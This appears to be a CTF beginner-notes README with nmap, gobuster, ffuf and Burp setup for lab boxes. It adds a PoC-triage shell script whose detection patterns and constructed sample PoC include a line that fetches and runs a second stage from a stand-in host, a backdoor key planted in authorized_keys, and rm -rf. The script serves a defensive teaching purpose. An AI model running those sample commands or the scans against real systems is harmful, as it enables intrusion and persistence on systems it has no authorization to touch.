0xsyr0/CTF-Notes

CTF-Notes

From Zero To Hero

About this repository

This repository will contain various notes, code snippets, hints and different sources related to all kinds of cybersecurity topics, dropped by our team members.

Where to Start

Basic Knowledge

  • It is recommended to work in a virtual environment, such as a Kali Linux instance running on VirtualBox or VMware Player.
  • Make sure you downloaded the correct .ovpn file to connect to the network and access your box.
$ sudo openvpn /PATH/TO/OVPNFILE/<USERNAME>.ovpn
  • Wordlists are usually located in /usr/share/wordlists/. The most commonly used ones are:
  • If you are missing some tools, try to install them from the Kali Linux repository.
$ sudo apt-get install kali-linux-everything
  • If a website is not reachable via its IP address and redirects you, try adding it to the /etc/hosts file.
  • Always familiarize yourself with the tools you use and check out their documentation as well as the -h parameter.
  • Don't run exploits from the internet without understanding what they are doing.
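
A quick static pass helps with the last point before you read a downloaded PoC in full. The script below is an added example, not part of the original repository: `triage_poc`, `scan` and `write_sample_poc` are hypothetical names, and the pattern list and the sample PoC (using the documentation address 192.0.2.10) are constructed for illustration.

```shell
#!/bin/sh
# Added example: static triage of a downloaded PoC before running it.
# The categories and regexes are assumptions of this sketch, not a verdict.

scan() {  # scan CATEGORY REGEX FILE -> "line:category:text" per match
    grep -nE -- "$2" "$3" | sed "s/^\([0-9]*\):/\1:$1:/" || true
}

# Prints findings sorted by line. Returns 0 = none, 1 = findings, 2 = unreadable.
triage_poc() {
    file=$1
    [ -r "$file" ] || { echo "cannot read: $file" >&2; return 2; }
    report=$(
        scan download-and-run '(curl|wget)[^|;]*\|[[:space:]]*(ba)?sh([^[:alnum:]]|$)' "$file"
        scan encoded-payload 'base64[[:space:]]+(-d|--decode)|b64decode' "$file"
        scan dynamic-exec '(^|[^[:alnum:]_])(eval|exec)[[:space:](]' "$file"
        scan destructive '(^|[^[:alnum:]_])rm[[:space:]]+-[a-zA-Z]*(rf|fr)|mkfs|dd[[:space:]]+if=' "$file"
        scan persistence 'authorized_keys|crontab|/etc/(passwd|shadow|sudoers)' "$file"
        scan hardcoded-endpoint 'https?://[[:alnum:]]|([0-9]{1,3}\.){3}[0-9]{1,3}' "$file"
    )
    if [ -z "$report" ]; then return 0; fi
    printf '%s\n' "$report" | sort -t: -k1,1n
    return 1
}

# Constructed sample: a "PoC" that talks to the target ($1) but also pulls a
# second stage from a hard-coded host and touches the operator's own account.
write_sample_poc() {
    cat > "$1" <<'EOF'
#!/bin/sh
# usage: ./poc.sh <RHOST>
curl -s "http://$1/login" -d 'user=admin'
curl -s http://192.0.2.10/stage2.sh | sh
echo c3NoLXJzYSBBQUFB | base64 -d >> ~/.ssh/authorized_keys
rm -rf /tmp/work
EOF
}

# Demo on the constructed sample.
sample=$(mktemp) && write_sample_poc "$sample"
triage_poc "$sample" || echo "findings above: read those lines before running"
rm -f "$sample"
```

A clean result only means none of these patterns matched; it does not replace reading the code, and compiled or obfuscated PoCs need a disposable VM.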

First Steps

There are some basic things you should be aware of when approaching a new box.

  • Make sure to take proper notes. You may want to consider writing them in Markdown, using Obsidian for example. Here are a few alternatives:
  • Always keep some sort of reconnaissance running in the background, like directory busting with Gobuster, which can take some time.
  • Make sure to enumerate every service and every endpoint properly. On a website, for example, check for usernames and email address schemes, check the source of the website, and click or hover over every link you can find to see if it leads to something.
  • Check for already known vulnerabilities and exploits. For that you can simply use Google. Here are a few examples:
    • <APPLICATION> vulnerability
    • <APPLICATION> <VERSION> vulnerability
    • <APPLICATION> <VERSION> exploit
    • <APPLICATION> <VERSION> poc
    • <APPLICATION> <VERSION> github
    • <APPLICATION> <VERSION> github poc
    • <APPLICATION> <VERSION> github advisory
  Alternatively, check Exploit Database or Sploitus, or use searchsploit from the command line.
$ searchsploit <APPLICATION>

Checklist

Depending on what a box offers to you, you can go through the following checklist.

  1. Run nmap!
$ sudo nmap -sC -sV -p- <RHOST>
$ sudo nmap -sC -sV -Pn -p- <RHOST>
$ sudo nmap -sV -sU <RHOST>
  2. If a web server is available, check robots.txt.

http://RHOST/robots.txt

  3. Also, give whatweb a try.
$ whatweb http://<RHOST>
  4. On websites, try directory busting with different wordlists.
$ gobuster dir -u http://<RHOST>/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
  5. Check for subdomains. If a box offers you a vhost entry like http://openadmin.htb/, for example, it is always worth checking whether more vhosts are configured.
$ gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt
$ gobuster vhost -u <RHOST> -t 50 -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain
$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.openadmin.htb" -u http://openadmin.htb --mc all --fs <NUMBER>
  6. Intercept web requests with Burp Suite. Without getting too deep into the usage of Burp Suite, here are the steps to configure it in your browser.
    • Start Burp Suite and open your browser on http://burp.
    • Then download the CA Certificate.
    • Depending on your browser, switch to settings and then to certificates.
    • Import the certificate.
    • We recommend using FoxyProxy and configuring it there, but you can also go with the proxy settings of your browser.

| Setting                      | Value     |
|------------------------------|-----------|
| Proxy Type                   | HTTP      |
| Proxy IP address or DNS name | 127.0.0.1 |
| Port                         | 8080      |

    • In Burp Suite switch to Target > Proxy settings and select Use advanced scope control.
    • Add the IP address of the box you are approaching.
    • Switch to the Proxy tab, move to Intercept and click on Intercept is off to enable it.
    • Finally, switch the proxy in FoxyProxy to the Burp Suite configuration and access the website. Now you can intercept the web traffic coming from and going to the box and modify it as you want.

Tool Recommendations

Below you will find just a few tools to start with. Of course, this is not a complete list, and there are always better tools for the job out there. Take small steps and get comfortable with the tools and techniques to develop, and eventually improve, your own approach to a system.

Information Gathering
Vulnerability Analysis
Web Application Analysis
Database Assessment
Password Attacks
Exploitation / Post Exploitation Tools

Trainings

If you feel you need to learn the fundamentals of a new topic or to improve your knowledge in specific areas, I would recommend checking out TryHackMe, which provides valuable learning paths on various topics.

Here are a few room recommendations for beginners.

Hacking Resources & Tutorials

Here are a few resources and knowledge bases covering various topics. Starting with the writeup videos of IppSec is always a good call.

Purplestorm Wallpapers

With a few modifications to the gorgeous art of Daena Key and Dominik Mayer, we present the Purplestorm Wallpapers for you to use and download.

Also feel free to get in touch with us on our Discord, we are all willing to help!

